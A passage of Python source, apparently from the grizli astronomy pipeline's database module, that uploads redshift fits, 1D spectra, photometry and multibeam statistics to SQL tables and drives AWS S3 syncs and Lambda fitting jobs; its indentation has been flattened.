from astropy.table import Table
from astropy.time import Time
NOW = Time.now().iso
if isinstance(rowfile, str):
if rowfile.endswith('.fits'):
tab = Table.read(rowfile, character_as_bytes=False)
allowed_columns = COLUMNS
else:
# Output of stellar fits
tab = Table.read(rowfile, format='ascii.commented_header')
tab['chinu'] = tab['chi2']/tab['dof']
tab['phot_root'] = tab['root']
tab.rename_column('best_template', 'stellar_template')
try:
tab['chinu'] = tab['chi2']/tab['dof']
tab['phot_root'] = tab['root']
# BIC of spline-only and template fits
bic_spl = np.log(tab['dof'])*(tab['nk']-1) + tab['chi2_flat']
bic_star = np.log(tab['dof'])*(tab['nk']) + tab['chi2']
tab['bic_diff_star'] = bic_spl - bic_star
except:
print('Parse {0} failed'.format(rowfile))
pass
allowed_columns = ['root', 'id', 'ra', 'dec', 'chi2', 'nk', 'dof',
'chinu', 'chi2_flat', 'bic_diff_star', 'mtime',
'stellar_template', 'status', 'phot_root',
'as_epsf']
else:
tab = rowfile
if 'cdf_z' in tab.colnames:
cdf_z = tab['cdf_z'].data
tab.remove_column('cdf_z')
else:
cdf_z = None
tab['mtime'] = NOW
tab['status'] = status_flag
remove_cols = []
for c in tab.colnames:
if '-' in c:
tab.rename_column(c, c.replace('-', '_'))
for c in tab.colnames:
tab.rename_column(c, c.lower())
# Remove columns not in the database
remove_cols = []
for c in tab.colnames:
if c not in allowed_columns:
#print('Remove column: ', c)
remove_cols.append(c)
if len(remove_cols) > 0:
tab.remove_columns(remove_cols)
row_df = tab.to_pandas()
if cdf_z is not None:
row_df['cdf_z'] = cdf_z.tolist()
return row_df
def delete_redshift_fit_row(root, id, table='redshift_fit', engine=None):
"""
Delete a row from the redshift fit table
"""
if engine is None:
engine = get_db_engine(echo=False)
res = engine.execute("DELETE from {2} WHERE (root = '{0}' AND id = {1})".format(root, id, table))
def add_redshift_fit_row(row_df, table='redshift_fit', engine=None, verbose=True):
"""
Update the row in the redshift_fit table
"""
if engine is None:
engine = get_db_engine(echo=False)
if isinstance(row_df, str):
row_df = get_row_data(row_df)
if ('root' not in row_df.columns) | ('id' not in row_df.columns):
print('Need at least "root" and "id" columns in the row data')
return False
root = row_df['root'][0]
id = row_df['id'][0]
status = get_redshift_fit_status(root, id, table=table, engine=engine)
# Delete the old row?
if status >= 0:
print('Delete and update row for {0}/{1} on `{2}`'.format(root, id,
table))
delete_redshift_fit_row(root, id, table=table, engine=engine)
else:
print('Add row for {0}/{1} on `{2}`'.format(root, id, table))
# Add the new data
row_df.to_sql(table, engine, index=False, if_exists='append', method='multi')
###########
def add_missing_rows(root='j004404m2034', engine=None):
"""
Add rows that were completed but that aren't in the table
"""
import glob
from astropy.table import vstack, Table
import pandas as pd
from grizli.aws import db as grizli_db
if engine is None:
engine = grizli_db.get_db_engine(echo=False)
os.system('aws s3 sync s3://grizli-v1/Pipeline/{0}/Extractions/ ./ --exclude "*" --include "*row.fits"'.format(root))
row_files = glob.glob('{0}*row.fits'.format(root))
row_files.sort()
res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE root = '{0}' AND status=6".format(root), engine)
res_ids = res['id'].to_list()
tabs = []
print('\n\n NROWS={0}, NRES={1}\n\n'.format(len(row_files), len(res)))
for row_file in row_files:
id_i = int(row_file.split('.row.fits')[0][-5:])
if id_i not in res_ids:
grizli_db.add_redshift_fit_row(row_file, engine=engine, verbose=True)
def convert_1D_to_lists(file='j234420m4245_00615.1D.fits'):
"""
Convert 1D spectral data to lists suitable for putting into dataframes
and sending to the databases.
"""
from collections import OrderedDict
import astropy.io.fits as pyfits
from .. import utils
if not os.path.exists(file):
print('Spectrum file not found')
return False
im = pyfits.open(file)
obj_id = im[0].header['ID']
obj_root = im[0].header['TARGET']
if '.R30.' in file:
skip_columns = ['line', 'cont']
pref = 'spec1d_r30'
else:
skip_columns = []
pref = 'spec1d'
spectra = OrderedDict()
has_spectra = False
for gr in ['G102', 'G141', 'G800L']:
if gr in im:
has_spectra = True
sp = utils.GTable.read(file, hdu=gr)
prefix = '{0}_{1}_'.format(pref, gr.lower())
spd = {prefix+'id': obj_id, prefix+'root': obj_root}
for c in sp.colnames:
if c in skip_columns:
continue
spd[prefix+c] = sp[c].tolist()
spectra[gr.lower()] = spd
if has_spectra:
return spectra
else:
return False
def send_1D_to_database(files=[], engine=None):
"""
Send a list of 1D spectra to the spectra databases
ToDo: check for existing lines
"""
from collections import OrderedDict
import pandas as pd
if engine is None:
engine = get_db_engine()
tables = OrderedDict()
for file in files:
sp_i = convert_1D_to_lists(file=file)
print('Read spec1d file: {0}'.format(file))
for gr in sp_i:
# Initialize the columns
if gr not in tables:
tables[gr] = OrderedDict()
for c in sp_i[gr]:
tables[gr][c] = []
# Add the data
for c in sp_i[gr]:
tables[gr][c].append(sp_i[gr][c])
prefix = 'spec1d_r30' if '.R30.' in files[0] else 'spec1d'
for gr in tables:
tablename = '{0}_{1}'.format(prefix, gr)
df = pd.DataFrame(tables[gr])
# Put wavelengths in their own tables to avoid massive duplication
wave_table = tablename+'_wave'
if wave_table not in engine.table_names():
print('Create wave table: '+wave_table)
wdf = pd.DataFrame(data=tables[gr][wave_table][0],
columns=[wave_table])
wdf.to_sql(wave_table, engine, if_exists='replace',
index=True, index_label=tablename+'_idx')
# drop wave from spectra tables
df.drop('{0}_wave'.format(tablename), axis=1, inplace=True)
# Create table
if tablename not in engine.table_names():
print('Initialize table {0}'.format(tablename))
SQL = "CREATE TABLE {0} (\n".format(tablename)
SQL += ' {0}_root text,\n'.format(tablename)
SQL += ' {0}_id integer,\n'.format(tablename)
for c in df.columns:
item = df[c][0]
if isinstance(item, list):
SQL += ' {0} real[{1}],\n'.format(c, len(item))
engine.execute(SQL[:-2]+')')
try:
engine.execute("CREATE INDEX {0}_idx ON {0} ({0}_root, {0}_id);".format(tablename))
except:
pass
# Delete existing duplicates
if tablename in engine.table_names():
SQL = """DELETE from {0} WHERE """.format(tablename)
mat = ["({0}_root = '{1}' AND {0}_id = {2})".format(tablename, r, i) for r, i in zip(df[tablename+'_root'], df[tablename+'_id'])]
SQL += 'OR '.join(mat)
rsp = engine.execute(SQL)
# Send the table
print('Send {0} rows to {1}'.format(len(df), tablename))
df.to_sql(tablename, engine, index=False, if_exists='append',
method='multi')
def add_all_spectra():
from grizli.aws import db as grizli_db
roots = grizli_db.from_sql("select root,count(root) as n from redshift_fit group BY root order by n DESC", engine)
o = 1
for root in roots['root'][::o]:
existing = open('log').readlines()
if root+'\n' in existing:
print('Skip', root)
continue
fp = open('log', 'a')
fp.write(root+'\n')
fp.close()
try:
grizli_db.add_oned_spectra(root=root, engine=engine)
except:
pass
def add_oned_spectra(root='j214224m4420gr01', bucket='grizli-v1', engine=None):
import os
import glob
from collections import OrderedDict
if engine is None:
engine = get_db_engine()
# import boto3
# s3 = boto3.resource('s3')
# bkt = s3.Bucket(bucket)
#
# files = [obj.key for obj in bkt.objects.filter(Prefix='Pipeline/{0}/Extractions/'.format(root))]
#
# for file in files:
# if (('.R30.fits' in file) | ('.1D.fits' in file)) & (not os.path.exists(file)):
# local_file = os.path.basename(file)
# print(local_file)
# bkt.download_file(file, local_file,
# ExtraArgs={"RequestPayer": "requester"})
os.system('aws s3 sync s3://{0}/Pipeline/{1}/Extractions/ ./ --exclude "*" --include "*R30.fits" --include "*1D.fits"'.format(bucket, root))
nmax = 500
# 1D.fits
files = glob.glob('{0}_*1D.fits'.format(root))
files.sort()
for i in range(len(files)//nmax+1):
send_1D_to_database(files=files[i*nmax:(i+1)*nmax], engine=engine)
files = glob.glob('{0}_*R30.fits'.format(root))
files.sort()
for i in range(len(files)//nmax+1):
send_1D_to_database(files=files[i*nmax:(i+1)*nmax], engine=engine)
os.system('rm {0}_*.1D.fits {0}_*.R30.fits'.format(root))
if False:
import scipy.ndimage as nd
import matplotlib.pyplot as plt
tablename = 'spec1d_g141'
#tablename = 'spec1d_g102'
#tablename = 'spec1d_r30_g141'
if 1:
# by root
resp = pd.read_sql_query("SELECT root, id, z_map, q_z, sp.* from redshift_fit, {1} as sp WHERE {1}_root = root AND {1}_id = id AND root = '{0}' AND q_z > -0.7 ORDER BY z_map".format(root, tablename), engine)
else:
# everything
resp = pd.read_sql_query("SELECT root, id, z_map, q_z, sp.* from redshift_fit, {1} as sp WHERE {1}_root = root AND {1}_id = id AND q_z > -0.7 ORDER BY z_map".format(root, tablename), engine)
# Halpha EW
resp = pd.read_sql_query("SELECT root, id, z_map, q_z, ew50_ha, flux_ha, err_ha, t_g141, sp.* from redshift_fit, {1} as sp WHERE {1}_root = root AND {1}_id = id AND q_z > -0.3 AND err_ha > 0 ORDER BY ew50_ha".format(root, tablename), engine)
# Everything
fresp = pd.read_sql_query("SELECT root, id, z_map, q_z, ew50_ha, flux_ha, err_ha, ew50_oiii, ew50_hb, ew50_oii, d4000, d4000_e, t_g141, t_g102, t_g800l, sp.* from redshift_fit, {1} as sp WHERE {1}_root = root AND {1}_id = id AND q_z > -0.7 AND chinu < 2 ORDER BY z_map".format(root, tablename), engine)
wave = pd.read_sql_query("SELECT * from {0}_wave".format(tablename),
engine)[tablename+'_wave'].values
resp = fresp
sort_column = 'z_map'
bin_factor = 1
wnorm = 6400
zref = 1.3e4/wnorm-1
sel = np.isfinite(fresp[sort_column]) & (fresp[sort_column] != -99)
norm_ix = np.interp(wnorm*(1+fresp['z_map']), wave, np.arange(len(wave)), left=np.nan, right=np.nan)
sel &= np.isfinite(norm_ix)
resp = fresp[sel]
norm_ix = np.cast[int](np.round(np.interp(wnorm*(1+resp['z_map']), wave, np.arange(len(wave)), left=np.nan, right=np.nan)))
resp.sort_values(sort_column, inplace=True)
if tablename == 'spec1d_g141':
exptime = resp['t_g141'].values
wlim = [1.1e4, 1.65e4]
else:
exptime = resp['t_g102'].values
wlim = [8000, 1.1e4, 1.65e4]
data = OrderedDict()
for c in resp.columns:
if c.startswith(tablename):
c_i = c.split(tablename+'_')[1]
try:
data[c_i] = np.array(resp[c].values.tolist())
except:
pass
#plt.imshow((data['flux'] - data['cont'])/data['flat']/1.e-19, vmin=-0.1, vmax=10)
# Rest-frame
dz = np.diff(wave)[10]/wave[10]
max_zshift = np.cast[int](np.log(1+resp['z_map'].max())/dz)
zshift = np.cast[int]((np.log(1+resp['z_map']) - np.log(1+zref))/dz)
err_max = 5
# Continuum normalized
#norm = data['cont'][:,100]/data['flat'][:,100]
norm = np.zeros(len(resp))
for i, ix in enumerate(norm_ix):
norm[i] = data['line'][i, ix]/data['flat'][i, ix]
#norm = np.mean(data['cont'][:,50:120]/data['flat'][:,50:120], axis=1)
# 2D arrays
normed = ((data['flux']/data['flat']).T/norm).T
cnormed = ((data['cont']/data['flat']).T/norm).T
lnormed = (((data['line']-data['cont'])/data['flat']).T/norm).T
err = ((data['err']/data['flat']).T/norm).T
mask = np.isfinite(norm) & (norm > 0) & np.isfinite(norm_ix)
normed = normed[mask, :]
cnormed = cnormed[mask, :]
lnormed = lnormed[mask, :]
err = err[mask, :]
ivar = 1/err**2
ivar[err <= 0] = 0
# Weight by exposure time
ivar = (ivar.T*0+(exptime[mask]/4000.)*norm[mask]).T
zshift = zshift[mask]
# Clip edges
wclip = (wave > wlim[0]) & (wave < wlim[1])
mask_val = 1e10
normed[:, ~wclip] = -mask_val
cnormed[:, ~wclip] = -mask_val
lnormed[:, ~wclip] = -mask_val
sh = normed.shape
rest = np.zeros((sh[0], sh[1]+zshift.max()-zshift.min())) - mask_val
crest = np.zeros((sh[0], sh[1]+zshift.max()-zshift.min())) - mask_val
lrest = np.zeros((sh[0], sh[1]+zshift.max()-zshift.min())) - mask_val
rest[:, zshift.max():zshift.max()+sh[1]] = normed*1
crest[:, zshift.max():zshift.max()+sh[1]] = cnormed*1
lrest[:, zshift.max():zshift.max()+sh[1]] = lnormed*1
rest_ivar = np.zeros((sh[0], sh[1]+zshift.max()-zshift.min()))
rest_ivar[:, zshift.max():zshift.max()+sh[1]] = ivar*1
for i in range(sh[0]):
rest[i, :] = np.roll(rest[i, :], -zshift[i])
crest[i, :] = np.roll(crest[i, :], -zshift[i])
lrest[i, :] = np.roll(lrest[i, :], -zshift[i])
rest_ivar[i, :] = np.roll(rest_ivar[i, :], -zshift[i])
ok = np.isfinite(rest) & np.isfinite(rest_ivar) & (rest > -0.8*mask_val)
rest_ivar[~ok] = 0
rest[~ok] = -mask_val
crest[~ok] = -mask_val
lrest[~ok] = -mask_val
shr = rest.shape
nbin = int((shr[0]//shr[1])//2*bin_factor)*2
kernel = np.ones((1, nbin)).T
# npix = np.maximum(nd.convolve((rest > -0.8*mask_val)*1, kernel), 1)
# srest = nd.convolve(rest*(rest > -0.8*mask_val), kernel)
# sbin = (srest/npix)[::nbin,:]
# plt.imshow(sbin, vmin=0, vmax=5)
num = nd.convolve(rest*rest_ivar, kernel)
cnum = nd.convolve(crest*rest_ivar, kernel)
lnum = nd.convolve(lrest*rest_ivar, kernel)
den = nd.convolve(rest_ivar, kernel)
wbin = (num/den)[::nbin, :]
wbin[~np.isfinite(wbin)] = 0
cwbin = (cnum/den)[::nbin, :]
cwbin[~np.isfinite(cwbin)] = 0
lwbin = (lnum/den)[::nbin, :]
lwbin[~np.isfinite(lwbin)] = 0
plt.imshow(wbin, vmin=0, vmax=5)
plt.imshow((data['line'] - data['cont'])/data['flat']/1.e-19, vmin=-0.1, vmax=10)
def run_lambda_fits(root='j004404m2034', phot_root=None, mag_limits=[15, 26], sn_limit=7, min_status=None, engine=None, zr=[0.01, 3.4], bucket='grizli-v1', verbose=True, extra={'bad_pa_threshold': 10}, ids=None):
"""
Run redshift fits on lambda for a given root
"""
from grizli.aws import fit_redshift_lambda
from grizli import utils
from grizli.aws import db as grizli_db
if engine is None:
engine = grizli_db.get_db_engine()
import pandas as pd
import numpy as np
import glob
import os
print('Sync phot catalog')
if phot_root is None:
root = root
os.system('aws s3 sync s3://{1}/Pipeline/{0}/Extractions/ ./ --exclude "*" --include "*_phot*.fits"'.format(phot_root, bucket))
print('Sync wcs.fits')
os.system('aws s3 sync s3://{1}/Pipeline/{0}/Extractions/ ./ --exclude "*" --include "*_phot*.fits" --include "*wcs.fits"'.format(root, bucket))
phot = utils.read_catalog('{0}_phot_apcorr.fits'.format(phot_root))
phot['has_grism'] = 0
wcs_files = glob.glob('*wcs.fits')
for f in wcs_files:
w = utils.WCSFootprint(f, ext=0)
has = w.path.contains_points(np.array([phot['ra'], phot['dec']]).T)
print(f, has.sum())
phot['has_grism'] += has
mag = phot['mag_auto']*np.nan
mag_filt = np.array([' ']*len(phot))
sn = phot['mag_auto']*np.nan
for filt in ['f160w', 'f140w', 'f125w', 'f105w', 'f110w', 'f098m', 'f814w', 'f850lp', 'f606w', 'f775w']:
if '{0}_tot_1'.format(filt) in phot.colnames:
mag_i = 23.9-2.5*np.log10(phot['{0}_tot_1'.format(filt)])
fill = (~np.isfinite(mag)) & np.isfinite(mag_i)
mag[fill] = mag_i[fill]
mag_filt[fill] = filt
sn_i = phot['{0}_tot_1'.format(filt)]/phot['{0}_etot_1'.format(filt)]
sn[fill] = sn_i[fill]
sel = np.isfinite(mag) & (mag >= mag_limits[0]) & (mag <= mag_limits[1]) & (phot['has_grism'] > 0)
sel &= phot['flux_radius'] > 1
sel &= sn > sn_limit
if min_status is not None:
res = pd.read_sql_query("SELECT root, id, status, mtime FROM redshift_fit WHERE root = '{0}'".format(root, min_status), engine)
if len(res) > 0:
status = phot['id']*0-100
status[res['id']-1] = res['status']
sel &= status < min_status
if ids is None:
ids = phot['id'][sel]
# Select just on min_status
if min_status > 1000:
if min_status > 10000:
# Include mag constraints
res = pd.read_sql_query("SELECT root, id, status, mtime, mag_auto FROM redshift_fit,photometry_apcorr WHERE root = '{0}' AND status = {1}/10000 AND mag_auto > {2} AND mag_auto < {3} AND p_root = root AND p_id = id".format(root, min_status, mag_limits[0], mag_limits[1]), engine)
else:
# just select on status
res = pd.read_sql_query("SELECT root, id, status, mtime FROM redshift_fit WHERE root = '{0}' AND status = {1}/1000".format(root, min_status, mag_limits[0], mag_limits[1]), engine)
ids = res['id'].tolist()
if len(ids) == 0:
return False
fit_redshift_lambda.fit_lambda(root=root, beams=[], ids=ids, newfunc=False, bucket_name=bucket, skip_existing=False, sleep=False, skip_started=False, show_event=False, zr=zr, force_args=True, quasar_fit=False, output_path=None, save_figures='png', verbose=verbose, **extra)
print('Add photometry: {0}'.format(root))
grizli_db.add_phot_to_db(phot_root, delete=False, engine=engine)
res = grizli_db.wait_on_db_update(root, dt=15, n_iter=120, engine=engine)
grizli_db.set_phot_root(root, phot_root, engine)
res = pd.read_sql_query("SELECT root, id, flux_radius, mag_auto, z_map, status, bic_diff, zwidth1, log_pdf_max, chinu FROM photometry_apcorr AS p JOIN (SELECT * FROM redshift_fit WHERE z_map > 0 AND root = '{0}') z ON (p.p_root = z.root AND p.p_id = z.id)".format(root), engine)
return res
if False:
res = pd.read_sql_query("SELECT root, id, status, redshift, bic_diff, mtime FROM redshift_fit WHERE (root = '{0}')".format(root), engine)
# Get arguments
args = fit_redshift_lambda.fit_lambda(root=root, beams=[], ids=ids, newfunc=False, bucket_name='grizli-v1', skip_existing=False, sleep=False, skip_started=False, quasar_fit=False, output_path=None, show_event=2, zr=[0.01, 3.4], force_args=True)
def set_phot_root(root, phot_root, engine):
"""
"""
print(f'Set phot_root = {root} > {phot_root}')
SQL = f"""UPDATE redshift_fit
SET phot_root = '{phot_root}'
WHERE (root = '{root}');
"""
engine.execute(SQL)
if False:
# Check where phot_root not equal to root
res = pd.read_sql_query("SELECT root, id, status, phot_root FROM redshift_fit WHERE (phot_root != root)".format(root), engine)
# update the one pointing where it should change in photometry_apcorr
engine.execute("UPDATE photometry_apcorr SET p_root = 'j214224m4420' WHERE root = 'j214224m4420gr01';")
engine.execute("UPDATE redshift_fit SET phot_root = 'j214224m4420' WHERE root LIKE 'j214224m4420g%%';")
engine.execute("UPDATE redshift_fit_quasar SET phot_root = 'j214224m4420' WHERE root LIKE 'j214224m4420g%%';")
if False:
# Replace in-place
from grizli.aws import db as grizli_db
engine.execute("update redshift_fit set phot_root = replace(root, 'g800l', 'grism') WHERE root not like 'j214224m4420%%' AND root LIKE '%%-grism%%")
engine.execute("update redshift_fit set phot_root = replace(root, 'g800l', 'grism') WHERE root not like 'j214224m4420%%'")
engine.execute("update redshift_fit set phot_root = 'j214224m4420' WHERE root like 'j214224m4420gr%%'")
engine.execute("update redshift_fit_quasar set phot_root = replace(root, 'g800l', 'grism') where root like '%%g800l%%'")
# Set 3D-HST fields
res = grizli_db.from_sql("select distinct root from redshift_fit where root like '%%-grism%%'", engine)
for root in res['root']:
grizli_db.set_phot_root(root, root, engine)
grizli_db.set_phot_root(root.replace('-grism', '-g800l'), root, engine)
xres = grizli_db.from_sql("select root, count(root) from redshift_fit where root like '{0}-%%' group by root".format(root.split('-')[0]), engine)
print(xres)
# Update OBJID for natural join
# for tab in ['redshift_fit', 'redshift_fit_quasar', 'multibeam']
SQL = """
WITH sub AS (
SELECT objid as p_objid, p_root, p_id
FROM photometry_apcorr
)
UPDATE redshift_fit
SET objid = p_objid
FROM sub
WHERE phot_root = p_root AND id = p_id;
"""
grizli_db.from_sql(SQL, engine)
engine.execute(SQL)
def wait_on_db_update(root, t0=60, dt=30, n_iter=60, engine=None):
"""
Wait for db to stop updating on root
"""
import pandas as pd
from astropy.table import Table
from grizli.aws import db as grizli_db
import numpy as np
import time
if engine is None:
engine = grizli_db.get_db_engine(echo=False)
n_i, n6_i, checksum_i = -1, -1, -1
for i in range(n_iter):
res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE root = '{0}'".format(root), engine)
checksum = (2**res['status']).sum()
n = len(res)
n6 = (res['status'] == 6).sum()
n5 = (res['status'] == 5).sum()
if (n == n_i) & (checksum == checksum_i) & (n6 == n6_i):
break
now = utils.nowtime()
print('{0}, {1}: n={2:<5d} n5={5:<5d} n6={3:<5d} checksum={4}'.format(root, now, n, n6, checksum, n5))
n_i, n6_i, checksum_i = n, n6, checksum
if i == 0:
time.sleep(t0)
else:
time.sleep(dt)
return res
##
def fit_timeouts(root='j004404m2034', mag_limits=[15, 26], sn_limit=7, min_status=None, engine=None):
"""
Run redshift fits on lambda for a given root
"""
from grizli.aws import fit_redshift_lambda
from grizli import utils
from grizli.aws import db as grizli_db
if engine is None:
engine = grizli_db.get_db_engine()
import pandas as pd
import numpy as np
import glob
import os
res = pd.read_sql_query("SELECT id, status FROM redshift_fit WHERE root = '{0}' AND status = 5".format(root), engine)
if len(res) == 0:
return True
ids = res['id'].tolist()
fit_redshift_lambda.fit_lambda(root=root, beams=[], ids=ids, newfunc=False, bucket_name='grizli-v1', skip_existing=False, sleep=False, skip_started=False, quasar_fit=False, output_path=None, show_event=False, zr=[0.01, 2.4], force_args=True)
res = grizli_db.wait_on_db_update(root, dt=15, n_iter=120, engine=engine)
return res
# All timeouts
events = fit_redshift_lambda.fit_lambda(root='egs-g800l-j141956p5255', beams=[], ids=[20667], newfunc=False, bucket_name='grizli-v1', skip_existing=False, sleep=False, skip_started=False, quasar_fit=False, output_path=None, show_event=2, zr=[0.01, 2.4], force_args=True)
res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE status = 5 AND root NOT LIKE 'cos-grism%%' ORDER BY root".format(root), engine)
base = {'bucket': 'grizli-v1', 'skip_started': False, 'quasar_fit': False, 'zr': '0.01,2.4', 'force_args': True, 'bad_pa_threshold': 10, 'use_phot_obj': False, 'save_figures': 'png'}
all_events = fit_redshift_lambda.generate_events(res['root'], res['id'], base=base, send_to_lambda=True)
#################
# Fit locally on EC2
i0 = 0
import os
import pandas as pd
import numpy as np
from grizli.aws import db as grizli_db
from grizli.aws import fit_redshift_lambda, lambda_handler
engine = grizli_db.get_db_engine(echo=False)
res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE status = 5 AND root NOT LIKE 'cos-grism%%' AND root LIKE '%%-grism%%' ORDER BY root", engine)
res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE status = 5 AND root NOT LIKE 'cos-grism%%' AND root NOT LIKE '%%-grism%%' AND root NOT LIKE '%%g800l%%' ORDER BY root", engine)
bucket = 'grizli-v1'
res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE status = 5 AND root LIKE 'j114936p2222' ORDER BY id", engine)
bucket = 'grizli-v1'
# res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE status = 5 AND root LIKE 'cos-grism%%' order by id", engine)
# bucket = 'grizli-cosmos-v2'
N = len(res)
np.random.seed(1)
so = np.argsort(np.random.normal(size=N))
base = {'bucket': bucket, 'skip_started': False, 'quasar_fit': False, 'zr': '0.01,3.4', 'force_args': True, 'bad_pa_threshold': 10, 'use_phot_obj': False, 'save_figures': 'png', 'verbose': True, 'working_directory': os.getcwd()}
events = fit_redshift_lambda.generate_events(res['root'], res['id'], base=base, send_to_lambda=False)
for event in events[i0::2]:
lambda_handler.handler(event, {})
########
xres = pd.read_sql_query("SELECT root, p_ra as ra, p_dec as dec, id, status FROM redshift_fit WHERE status = 5 AND root LIKE 'gds-grism%%' ORDER BY root".format(root), engine)
print(len(res), len(xres))
# show points
xres = pd.read_sql_query("SELECT root, p_ra as ra, p_dec as dec, id, status FROM redshift_fit WHERE status = 5 AND root LIKE 'gds-grism%%' ORDER BY root".format(root), engine)
# Photometry table
def set_filter_bits(phot):
"""
Set bits indicating available filters
"""
import numpy as np
filters = ['f160w', 'f140w', 'f125w', 'f110w', 'f105w', 'f098m', 'f850lp', 'f814w', 'f775w', 'f625w', 'f606w', 'f475w', 'f438w', 'f435w', 'f555w', 'f350lp', 'f390w', 'f336w', 'f275w', 'f225w']
bits = [np.uint32(2**i) for i in range(len(filters))]
phot['filter_bit'] = np.zeros(len(phot), dtype=np.uint32)
phot['red_bit'] = np.zeros(len(phot), dtype=np.uint32)
for i, filt in enumerate(filters):
col = '{0}_flux_aper_0'.format(filt)
if col in phot.colnames:
red = bits[i] * np.isfinite(phot[col]) * (phot['filter_bit'] == 0)
phot['filter_bit'] |= bits[i] * np.isfinite(phot[col])
phot['red_bit'] |= red
print(filt, i, bits[i], red.max())
def phot_to_dataframe(phot, root):
"""
Convert phot_apcorr.fits table to a pandas DataFrame
- Add 'root' column
- remove "dummy" columns
- rename 'xmin', 'xmax', 'ymin', 'ymax' to 'image_xmin', ...
"""
phot['root'] = root
set_filter_bits(phot)
for c in ['dummy_flux', 'dummy_err']:
if c in phot.colnames:
phot.remove_column(c)
for c in ['xmin', 'xmax', 'ymin', 'ymax']:
phot.rename_column(c, 'image_'+c)
for c in ['root', 'id', 'ra', 'dec']:
phot.rename_column(c, 'p_'+c)
df = phot.to_pandas()
return df
def add_phot_to_db(root, delete=False, engine=None, nmax=500):
"""
Read the table {root}_phot_apcorr.fits and append it to the grizli_db `photometry_apcorr` table
"""
import pandas as pd
from astropy.table import Table
from grizli.aws import db as grizli_db
import numpy as np
if engine is None:
engine = grizli_db.get_db_engine(echo=False)
res = pd.read_sql_query("SELECT p_root, p_id FROM photometry_apcorr WHERE p_root = '{0}'".format(root), engine)
if len(res) > 0:
if delete:
print('Delete rows where root={0}'.format(root))
res = engine.execute("DELETE from photometry_apcorr WHERE (p_root = '{0}')".format(root))
if False:
res = engine.execute("DELETE from redshift_fit WHERE (root = '{0}')".format(root))
else:
print('Data found for root={0}, delete them if necessary'.format(root))
return False
# Read the catalog
phot = Table.read('{0}_phot_apcorr.fits'.format(root), character_as_bytes=False)
# remove columns
remove = []
for c in phot.colnames:
if ('_corr_' in c) | ('_ecorr_' in c) | (c[-5:] in ['tot_4', 'tot_5', 'tot_6']) | ('dummy' in c):
remove.append(c)
phot.remove_columns(remove)
# Add new filter columns if necessary
empty = pd.read_sql_query("SELECT * FROM photometry_apcorr WHERE false", engine)
df = phot_to_dataframe(phot, root)
new_cols = []
for c in df.columns:
if c not in empty.columns:
new_cols.append(c)
if len(new_cols) > 0:
for c in new_cols:
print('Add column {0} to `photometry_apcorr` table'.format(c))
sql = "ALTER TABLE photometry_apcorr ADD COLUMN {0} real;".format(c)
res = engine.execute(sql)
# Add new table
print('Send {0}_phot_apcorr.fits to `photometry_apcorr`.'.format(root))
if nmax > 0:
# Split
N = len(phot) // nmax
for i in range(N+1):
print(' add rows {0:>5}-{1:>5} ({2}/{3})'.format(i*nmax, (i+1)*nmax, i+1, N+1))
df[i*nmax:(i+1)*nmax].to_sql('photometry_apcorr', engine, index=False, if_exists='append', method='multi')
else:
df.to_sql('photometry_apcorr', engine, index=False, if_exists='append', method='multi')
def multibeam_to_database(beams_file, engine=None, Rspline=15, force=False, **kwargs):
"""
Send statistics of the beams.fits file to the database
"""
import numpy as np
import pandas as pd
from astropy.time import Time
from .. import multifit, utils
if engine is None:
engine = get_db_engine(echo=False)
mtime = Time(os.stat(beams_file).st_mtime, format='unix').iso
root = beams_file.split('_')[0]
id = int(beams_file.split('_')[1].split('.')[0])
res = pd.read_sql_query("SELECT mtime from multibeam WHERE (root = '{0}' AND id = {1})".format(root, id), engine)
if len(res) == 1:
if (res['mtime'][0] == mtime) & (not force):
print('{0} already in multibeam table'.format(beams_file))
return True
mb = multifit.MultiBeam(beams_file, **kwargs)
print('Update `multibeam` and `beam_geometry` tables for {0}.'.format(beams_file))
# Dummy for loading the templates the same way as for the quasars
# for generating the spline fit
templ_args = {'uv_line_complex': True,
'broad_fwhm': 2800,
'narrow_fwhm': 1000,
'fixed_narrow_lines': True,
'Rspline': Rspline,
'include_reddened_balmer_lines': False}
q0, q1 = utils.load_quasar_templates(**templ_args)
for t in list(q0.keys()):
if 'bspl' not in t:
q0.pop(t)
tfit = mb.template_at_z(0, templates=q0, fitter='lstsq')
sp = tfit['line1d'].wave, tfit['line1d'].flux
m2d = mb.get_flat_model(sp, apply_mask=True, is_cgs=True)
mb.initialize_masked_arrays()
chi0 = (mb.scif_mask**2*mb.ivarf[mb.fit_mask]).sum()
# Percentiles of masked contam, sci, err and contam/sci
pvals = np.arange(5, 96, 5)
mpos = m2d > 0
contam_percentiles = np.percentile(mb.contamf_mask, pvals)
sci_percentiles = np.percentile(mb.scif_mask, pvals)
err_percentiles = np.percentile(1/mb.sivarf[mb.fit_mask], pvals)
sn_percentiles = np.percentile(mb.scif_mask*mb.sivarf[mb.fit_mask], pvals)
fcontam_percentiles = np.percentile(mb.contamf_mask/mb.scif_mask, pvals)
# multibeam dataframe
df = pd.DataFrame()
float_type = np.float
df['root'] = [root]
df['id'] = [id]
df['objid'] = [-1]
df['mtime'] = [mtime]
df['status'] = [6]
df['scip'] = [list(sci_percentiles.astype(float_type))]
df['errp'] = [list(err_percentiles.astype(float_type))]
df['snp'] = [list(sn_percentiles.astype(float_type))]
df['snmax'] = [float_type((mb.scif_mask*mb.sivarf[mb.fit_mask]).max())]
df['contamp'] = [list(contam_percentiles.astype(float_type))]
df['fcontamp'] = [list(fcontam_percentiles.astype(float_type))]
df['chi0'] = [np.int32(chi0)]
df['rspline'] = [Rspline]
df['chispl'] = [np.int32(tfit['chi2'])]
df['mb_dof'] = [mb.DoF]
df['wmin'] = [np.int32(mb.wave_mask.min())]
df['wmax'] = [np.int32(mb.wave_mask.max())]
# Input args
for a in ['fcontam', 'sys_err', 'min_sens', 'min_mask']:
df[a] = [getattr(mb, a)]
# Send to DB
res = engine.execute("DELETE from multibeam WHERE (root = '{0}' AND id = {1})".format(mb.group_name, mb.id), engine)
df.to_sql('multibeam', engine, index=False, if_exists='append', method='multi')
# beams dataframe
d = {}
